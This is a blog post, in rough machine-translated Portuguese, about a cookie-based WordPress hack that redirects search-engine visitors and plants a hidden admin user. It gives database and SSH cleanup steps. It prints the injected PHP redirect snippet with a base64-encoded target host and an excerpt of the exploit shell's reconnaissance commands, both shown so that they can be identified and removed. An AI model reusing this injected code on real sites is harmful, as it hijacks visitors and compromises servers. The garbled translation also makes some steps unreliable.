No último mês, tenho recebido avisos vírus no blog a partir de alguns visitantes. Inicialmente eu ignorou as advertências, porque eu instalei um antivírus bom (Kaspersky AV 2009) E mesmo blog por um longo tempo, eu nunca recebi um alerta de vírus (muito tempo atrás .. eu vi algo suspeito que a primeira atualização desapareceu. Finalmente ...).
Lentamente, começou a mostrar grandes variações tráfego de visitantesDepois que recentemente diminuiu de forma constante tráfego e começou a ser mais e mais pessoas me dizem que stealthsettings.com é virused. Ontem recebi de alguém um screenshot feito quando bloqueou um antivírus escrita de stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Foi muito convincente para mim, então eu coloquei todas as fontes pesquisadas. A primeira idéia que me veio à mente era fazer atualização as últimas WordPress (2.5.1), mas não antes de excluir todos os arquivos no script antigo WordPress e fazer banco de dados de backup. Esse procedimento não funcionou e provavelmente demorei muito para descobrir onde estava o bug, se ele não tivesse me informado. Eugen em uma discussão sobre o café, ele encontrou link Google e seria bom vê-lo.
MyDigitalLife.info, publicou um artigo intitulado: “WordPress Hack: Recupere e corrija o Google e o mecanismo de pesquisa ou nenhum tráfego de cookies redirecionado para Your-Needs.info, AnyResults.Net, Golden-Info.net e outros sites ilegais"Essa é a ponta do fio que eu precisava.
É sobre um explorar de WordPress baseado em cookiesQue eu acho que é muito complexo e fez o livro. Inteligente o suficiente para fazer uma Injeção de SQL Blog do banco de dados, para criar um usuário invisível uma verificação de rotina simples Painel->Utilizadores, verificar os diretórios do servidor e arquivos "writable" (que chmod 777), pesquisar e executar arquivos com os privilégios do grupo ou da raiz. Eu não sei quem explorar o nome e ver que há poucos artigos escritos sobre ele, apesar do fato de que muitos blogs estão infectados, incluindo a Roménia. Ok ... vou tentar tentar explicar generalidades sobre o vírus.
O que é vírus?
Primeiro, insira as páginas fontes em blogs, links invisíveis para os visitantes, mas visível e indexável para motores de busca, especialmente o Google. Deste modo transferência de locais de Page Rank indicados pelo atacante. Em segundo lugar, outro é inserido código de redirecionamento URL para os visitantes provenientes do Google, Live, Yahoo, ... ou um leitor de RSS, e não o local em biscoito. um antivirus detecta o redirecionamento como Trojan-Clicker.HTML.
Os sintomas:
Diminuiu o tráfego de visitantes em massaEspecialmente em blogs, onde a maioria dos visitantes vêm do Google.
Identificação: (é aqui que o problema se complica para quem não entende muito de phpmyadmin, php e linux)
LA. ATENÇÃO! Primeiro faça uma base de dados de backup!
1. Verifique os arquivos de origem index.php, header.php, footer.php, O tema do blog e ver se há um código que usa criptografia base64 ou contém “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”na forma:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Ou algo assim. Excluir este código!
Clique sobre a imagem ...
Na captura de tela acima, selecionei acidentalmente e " " Esse código deve permanecer.
2. Usar phpMyAdmin e ir para o banco de dados tabela wp_usersOnde verificar se não há nenhum nome de usuário criada no 00:00:00 0000-00-00 (Possível no campo user_login escrever "WordPress”. Anote o ID desse usuário (campo ID) e exclua-o.
Clique sobre a imagem ...
* A linha verde deve ser removido e manteve o seu ID. No caso de sonolentoFoi ID = 8 .
3. Vá para a Tabela wp_usermetaOnde você localizado e limpar linhas de ID (onde o campo user_id Valor de ID é removido).
4. Na Tabela wp_option, Ir para active_plugins e ver o que plugin está habilitado suspeito. Ele pode ser usado como terminações _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc. combinações de extensões de imagem avançada com _old e _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Exclua este plug-in e vá para o blog -> Painel -> Plug-ins, onde você desativa e ativa qualquer plug-in.
Clique na imagem para vê-la aparecer active_plugins arquivo de vírus.
Siga o caminho no servidor FTP ou SSH, indicado no active_plugins e apagar o arquivo do servidor.
5. Também em phpMyAdmin, na Tabela wp_option, Localizar e apagar a linha que contém "rss_f541b3abd05e7962fcab37737f40fad8'E'internal_links_cache ".
Em internal_links_cache, ofereceu links de spam criptografados que aparecem em um blog código de Google Adsnuca, O hacker.
6. Recomenda-se a alterar sua senha Blog e login remover todos userele suspeito. Atualize para a versão mais recente do WordPress e defina o blog para parar de registrar novos usuários. Não há perda… eles também podem comentar desabitados.
Tentei explicar um pouco acima, o que fazer em tal situação, para limpar o blog desse vírus. O problema é muito mais sério do que parece e não está quase resolvido, pois são usados vulnerabilidades de segurança hospeda o servidor web, que é blog.
Como primeira medida de segurança, com acesso SSH, Fazer algumas verificações no servidor para ver se existem arquivos como * _old * e * _new. Com terminações.giff. jpeg. pngg. jpgg. Esses arquivos devem ser excluídos. Se você renomear um arquivo, por exemplo. top_right_old.giff in top_right_old.phpVemos que o arquivo é exatamente o servidor código de exploração.
Algumas instruções úteis para verificar, limpar e proteger o servidor. (via SSH)
1. cd / tmp e verificar se há pastas como tmpVFlma ou nome asemenatoare outras combinações e excluí-lo. Veja a imagem abaixo, duas pastas tais para mim:
rm-rf foldername
2. Verifique e elimine (altere chmod-ul) quanto possível as pastas com atributos chmod 777
encontre todos os arquivos graváveis no diretório atual: Encontrar. -Type f-perm-2-ls
encontrar todos os diretórios graváveis em dir atual: Encontrar. Tipo-d-perm-2-ls
encontre todos os diretórios e arquivos graváveis no diretório atual: Encontrar. -Perm-2-ls
3. À procura de arquivos suspeitos no servidor.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ATENÇÃO! os arquivos que foram estabelecidas pouco SUID si SGID. Esses arquivos são executados com os privilégios do usuário (grupo A) ou não raiz, o usuário que executar o arquivo. Esses arquivos podem levar ao comprometimento da raiz, se as questões de segurança. Se você não usar os arquivos SUID e SGID com pouco, execute 'chmod 0 " eles ou desinstalar pacote contendo eles.
Explorar contém em algum lugar a fonte ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Entende que maneira ... basicamente violações de segurança. Portas abertas privilégios diretório "gravável" do grupo e execução de arquivos / root.
De volta com mais ...
Alguns blogs infectados: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motos.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... A lista continua ... muito.
Você pode verificar se um blog está infectado usando o mecanismo de pesquisa Google. copiar colar:
Site: comprar www.blegoo.com
Boa noite e bom trabalho;) Em breve acho que Eugen virá com novidades, em foreseeable.unpredictable.com.
brb :)
ATENÇÃO! Mudando o tema de WordPress ou atualizar para WordPress 2.5.1, NÃO é uma solução para se livrar deste vírus.
